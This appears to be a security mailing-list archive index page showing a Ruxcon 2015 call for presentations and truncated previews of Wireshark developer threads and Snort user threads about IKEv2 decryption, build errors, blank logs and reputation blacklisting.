of the conference is to showcase the next generation of offensive and
defensive security technology. We happily open doors to researchers
and hackers around the world working on the next big thing in security
and request...
Ruxcon 2015 Final Call For Presentations
cfp (Jul 05)
Ruxcon 2015 Final Call For Presentations
Melbourne, Australia, October 24-25
CQ Function Centre
http://www.ruxcon.org.au
The Ruxcon team is pleased to announce the first round of Call For Presentations for Ruxcon 2015.
This year the conference will take place over the weekend of the 24th and 25th of October at the CQ Function Centre,
Melbourne, Australia.
The deadline for submissions is the 15th of September, 2015.
.[x]. About Ruxcon .[x]....
Wireshark — Discussion of the free and open source Wireshark network sniffer. No other sniffer (commercial or otherwise) comes close. This archive combines the Wireshark announcement, users, and developers mailing lists.
Are AEAD cyphers accepted for IKEv2 decryption table?
Codrut Grosu (Aug 02)
Hi,
I'm working at a strongSwan plugin that will generate an IKEv2 decryption table for wireshark.
In IKEv2 decryption table(wireshark) at encryption algorithm field there are only the following algorithms:
"3DES[RFC2451]", "AES-CBC-128[RFC3602]", "AES-CBC-192[RFC3602]", "AES-CBC-256[RFC3602]" and "NULL[RFC2410]".
But strongSwan accepts AEAD cyphers like: AES_CCM_ICV8, AES_CCM_ICV12,...
Re: extcap.c does not build on SUSE 11.3. g_spawn_check_exit_status requires glib 2.34
Roland Knall (Aug 01)
Hi
No, I've uploaded a new patch to gerrit (
https://code.wireshark.org/review/16827), which removes the need for this
function. Just fyi, the min glib version to be supported is 2.14.0, and
although I'd appreciate a discussion to change that in the future, this
patch is a pretty simple fix.
regards
Roland
Re: make dist fails if built without Qt
João Valverde (Aug 01)
Should be fixed in https://code.wireshark.org/review/#/c/16826/.
make dist fails if built without Qt
Anders Broman (Aug 01)
make[1]: Leaving directory wireshark/trunk/ui/gtk'
(cd ui/qt && make top_distdir=../../wireshark-2.3.0 distdir=../../wireshark-2.3.0/ui/qt \
am__remove_distdir=: am__skip_length_check=: am__skip_mode_fix=: distdir)
make[1]: Entering directory `/home/ericsson/ewireshark/trunk/ui/qt'
LRELEASE wireshark_de.qm
/bin/sh: -silent: command not found
make[1]: *** [wireshark_de.qm] Error 127
Re: extcap.c does not build on SUSE 11.3. g_spawn_check_exit_status requires glib 2.34
Dario Lombardo (Aug 01)
This call exists from glib 2.34. We should add this version as minimum
requirement to build extcap.
On Mon, Aug 1, 2016 at 10:34 AM, Anders Broman <anders.broman () ericsson com>
wrote:
extcap.c does not build on SUSE 11.3. g_spawn_check_exit_status requires glib 2.34
Anders Broman (Aug 01)
Hi,
I get
extcap.c:842: undefined reference to `g_spawn_check_exit_status' on SUSE 11.3 with top of trunk.
Perhaps we should not build extcap on such an old system?
Regards
Anders
Re: Small bug in Modbus dissector exception information
Dennis Luehring (Aug 01)
On 01.08.2016 at 09:12, Jaap Keuter wrote:
can't test it because the fix seems not be in latest
autobuild
https://wireshark.org/download/automated/win64/Wireshark-win64-2.3.0-140-gc611ede.exe
need to wait a little
Re: Small bug in Modbus dissector exception information
Jaap Keuter (Aug 01)
Hi,
It's solved, but does that 'exception bit' get dissected?
Thanks,
Jaap
Re: Small bug in Modbus dissector exception information
Dennis Luehring (Jul 30)
Done: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12693
On 30.07.2016 at 08:40, Roland Knall wrote:
Re: Small bug in Modbus dissector exception information
Roland Knall (Jul 29)
Hi
Please report this in a bug-report on https://bugs.wireshark.org/bugzilla/
and attach a sample trace detailing the issue.
regards
Roland
Small bug in Modbus dissector exception information
Dennis Luehring (Jul 29)
i use a "Live on the Bleeding Edge" Version
https://www.wireshark.org/download/automated/win64/Wireshark-win64-2.3.0-128-g98e8b26.exe
Sample Modbus-Exception-Code Response:
00 00 00 00 00 03 00 88 01
Modbus/TCP
Transaction Identifier: 0
Protocol Identifier: 0
Length: 3
Unit Identifier: 0
Function 8: Diagnostics. Exception: Illegal function
Function Code: Unknown (136) <-- !! the exception bit does not get...
Re: Question on payload reassembly
John Dunlop (Jul 28)
Thanks Roland/Jeff for the responses, much appreciated.
So spent a bit of time debugging this and it looks like we fail sometimes to return a valid frag_msg from a call to
fragment_add_seq_check() when more_frags is set to false. In the case this happens I am currently failing to see much
difference in how the id and frag_number are controlled i.e. they are unique and in-sequence respectively. The failing
point is that we receive NULL from...
Re: Question on payload reassembly
Roland Knall (Jul 28)
Hi
Just a short question, does your sequence counter repeat? If so, this can
be an issue. Also, for the openSAFETY dissector it only worked properly,
after I implemented fragment_add_seq_offset, so it will always count
internally beginning with 0. You can see that in line 1272 of
packet-opensafety.c
regards,
Roland
Re: Question on payload reassembly
Jeff Morriss (Jul 28)
Personally I use Google with a search string like:
what I'm interested in site://wireshark.org
Hmm, the reassembly routines should take care of this for you. See the
first 'if' statement in `fragment_add_seq_check_work()` (in
epan/reassemble.c): it checks if the current frame has already been
dissected and, if so, it skips reassembly and just returns what was stored
from the first pass.
It sounds like you are but are you...
Question on payload reassembly
John Dunlop (Jul 28)
Hi,
Hope someone can help me with a question of payload reassembly.
First up, I have been trawling the e-mail archives to find an equivalent answer and was wondering if there is a better
way of searching the e-mail archives than opening up each individual month/year?
Now my actual question is that I am dissecting a packet payload which is split up into fragments with specific chunks
as:
Begin
Middle (no begin/end flagged, so can be...
Snort — Everyone's favorite open source IDS, Snort. This archive combines the snort-announce, snort-devel, snort-users, and snort-sigs lists.
Re: Snort log is blank
Michael Iaconianni (Aug 02)
I want to clarify what I am trying to do. I can get alerts logged but I want every packet to be logged as well as the
alerts. Is there a way to do that?
From: Michael Iaconianni <michael.iaconianni () iaspecialists com>
Date: Tuesday, August 2, 2016 at 2:08 PM
To: "Al Lewis (allewi)" <allewi () cisco com>, "snort-users () lists...
Re: Snort log is blank
Michael Iaconianni (Aug 02)
Thank you for getting back to me. Attached is my snort.conf file. And yes, traffic is coming into the device. IP
tables are also set up correctly. I can also run snort in other modes.
From: "Al Lewis (allewi)" <allewi () cisco com>
Date: Tuesday, August 2, 2016 at 1:36 PM
To: Michael Iaconianni <michael.iaconianni () iaspecialists com...
Re: snort black list issue
anton van der leun (Aug 02)
Hello Hui
Oh that makes sense (DAQ BLACKLIST verdict, because that is what happening according to traces I have made:
Capture filter is: host == 5.157.87.137
did some pings and some telnet to port 80 of that ip address.
tried it several times, but what I saw was almost identical:
icmp's are always blocked
the first tcp SYN packet is always blocked.
EXAMPLE :
icmp (always no answer)
No. ...
Re: Snort log is blank
Al Lewis (allewi) (Aug 02)
Hello,
Do you have the config to share?
If not..
1) are you able to run snort in another mode? (i.e. afpacket, dump etc).
2) is there traffic coming into the device?
3) is iptables setup correctly? (since you are using nfq) see the daq readme.
Albert Lewis
ENGINEER.SOFTWARE ENGINEERING
SOURCEfire, Inc. now part of Cisco
Email: allewi () cisco com
From: Michael Iaconianni <michael.iaconianni ()...
Snort log is blank
Michael Iaconianni (Aug 02)
Hello,
I’m trying to run snort as an IDS. I use the following command to run snort:
snort -Q --daq nfq --daq-var device=br-lan --daq-var queue=1 -c /etc/snort/snort.conf -l log/ -D
However, when I check the log it is blank. When I try to read it with snort -r <logname> I get the following output
Error can’t initialize DAQ cap (-1) - truncated dump file; tried to read 4 file header bytes, only got 0. I’m guessing
there's a problem...
Re: snort black list issue
Hui cao (Aug 02)
Reputation preprocessor is called after session preprocessor. You can
capture traffic for that session and look at what happened with that
session. There are lots of other traffic.
If the DAQ you used support BLACKLIST verdict, DAQ will block the whole
session, so snort will not received those packets.
If DAQ does not support BLACKLIST verdict, it should drop the first
packet. After that, packets in that session will be blocked by snort...
Snort Subscriber Rules Update 2016-08-02
Research (Aug 02)
Talos Snort Subscriber Rules Update
Synopsis:
This release adds and modifies rules in several categories.
Details:
Talos has added and modified multiple rules in the browser-ie,
exploit-kit, file-office, file-other, file-pdf, malware-cnc,
malware-other and server-webapp rule sets to provide coverage for
emerging threats from these technologies.
For a complete list of new and modified rules please see:
https://www.snort.org/advisories
Re: snort black list issue
anton van der leun (Aug 02)
Hi Hui,
some more testing:
Aug 2 17:33:04 snort73 snort[2834]: ===============================================================================
Aug 2 17:33:04 snort73 snort[2834]: Reputation Preprocessor Statistics
Aug 2 17:33:04 snort73 snort[2834]: Total Memory Allocated: 2257540
Aug 2 17:33:04 snort73 snort[2834]: Number of packets blacklisted: 9
Aug 2 17:33:04 snort73 snort[2834]: Number of packets whitelisted: 7698
Aug 2...
Re: snort black list issue
anton van der leun (Aug 02)
I forgot …
Snort.conf:
# -- Begin GID:136 Based Rules -- #
drop ( msg: "REPUTATION_EVENT_BLACKLIST"; sid: 1; gid: 136; rev: 1; metadata: rule-type preproc ;
classtype:bad-unknown; )
# alert ( msg: "REPUTATION_EVENT_WHITELIST"; sid: 2; gid: 136; rev: 1; metadata: rule-type preproc ;
classtype:bad-unknown; )
From: Hui cao [mailto:huica () cisco com]
Sent: Tuesday, 2 August 2016 16:43
To: anton van der...
Re: snort black list issue
anton van der leun (Aug 02)
Hi Hui,
Yes, I checked that already.
The client of the test has ip address 192.168.63.1
The white-list is very short:
##callvoip
91.195.160.0/25
91.195.161.0/25
##microsoft
191.234.4.0/24
##ger schiedam glas:
163.158.245.128
##akama1
95.100.96.0/23
##dell download:
68.232.34.141
##alex:
37.59.121.224
##xenserver download:
95.100.97.40
##freenas:
64.62.136.60
192.168.63.100
##nagios
192.168.63.199
##ISPconfig...
Re: snort black list issue
Hui cao (Aug 02)
Hi Anton,
You have packets that are whitelisted. Have you checked that either IP
is not in whitelist?
Do you have this defined in your rule?
drop ( msg: "REPUTATION_EVENT_BLACKLIST"; sid: 1; gid: 136; rev: 1; )
Best,
Hui.
Re: Please remove me
Joel Esler (jesler) (Aug 02)
You may remove yourself by clicking on the link attached to the bottom of every email on this list to unsubscribe.
Please remove me
Shayesteh G (Aug 02)
Please remove me from the list
Re: snort black list issue
Hui cao (Aug 02)
Hi Anton,
Thanks a lot for the conf file.
Can you show me the snort exit statistics for tcp traffic?
ICMP is not tracked by session, so they will be called for each packet.
However, tcp and udp will be tracked and called only for the first
packet in the session.
Best,
Hui.
Re: snort black list issue
anton van der leun (Aug 01)
Hi Hui,
Many thanks for reply.
"once per session" is new for me and does not ring a bell.
please find below my preprocessor configuration:
= = = = = = = = = = = = = = = = = = = = =
###################################################
# Step #5: Configure preprocessors
# For more information, see the Snort Manual, Configuring Snort - Preprocessors
###################################################
# GTP Control Channle...
We also maintain archives for these lists (some are currently inactive):
Read some old-school private security digests such as Zardoz at SecurityDigest.Org
We're always looking for great network security related lists to archive. To suggest one, mail Fyodor.